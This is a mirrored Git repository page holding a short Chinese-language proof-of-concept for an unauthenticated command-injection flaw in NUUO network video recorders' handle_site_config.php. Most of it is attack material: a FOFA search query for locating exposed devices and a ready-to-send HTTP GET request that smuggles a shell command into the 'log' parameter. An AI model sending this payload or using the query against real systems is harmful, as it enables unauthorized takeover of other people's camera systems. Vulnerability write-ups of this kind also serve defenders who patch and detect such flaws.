admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-06 02:46:33 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/NUUO/NUUO摄像机handle_site_config远程代码执行漏洞.md

20 lines
608 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# NUUO摄像机handle_site_config远程代码执行漏洞
NUUO摄像头是中国台湾NUUO公司旗下的一款网络视频记录器NUUO摄像头handle_site_config.php存在未授权命令执行漏洞攻击者可以获取服务器权限
## fofa
```javascript
body="www.nuuo.com/eHelpdesk.php"
```
## poc
```javascript
GET /handle_site_config.php?log=;id; HTTP/1.1
Host:
Priority: u=0, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0
```
![image-20250219154105386](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502191541564.png)
Reference in New Issue Copy Permalink